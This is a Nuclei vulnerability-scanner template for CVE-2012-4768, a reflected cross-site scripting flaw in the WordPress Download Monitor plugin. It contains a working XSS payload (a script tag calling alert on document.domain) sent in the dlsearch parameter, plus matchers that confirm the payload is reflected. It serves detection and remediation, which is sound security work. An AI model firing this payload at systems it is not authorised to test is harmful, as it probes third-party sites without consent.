nuclei-templates/http/cves/2012/CVE-2012-4768.yaml

52 lines
1.8 KiB
YAML

id: CVE-2012-4768
info:
name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
remediation: |
Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2012-4768
- http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt
- http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/78422
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2012-4768
cwe-id: CWE-79
epss-score: 0.00922
epss-percentile: 0.81185
cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: mikejolley
product: download_monitor
framework: wordpress
tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress
http:
- method: GET
path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022031d4dfae56831071cad816dd789f7f660323fbf25d341c34ae0052339e3524250220790a5cf54bd3439fd54192f8cc1c48f95b318e6d8ea39584bc1f40ee7a449bfe:922c64590222798bb761d5b6d8e72950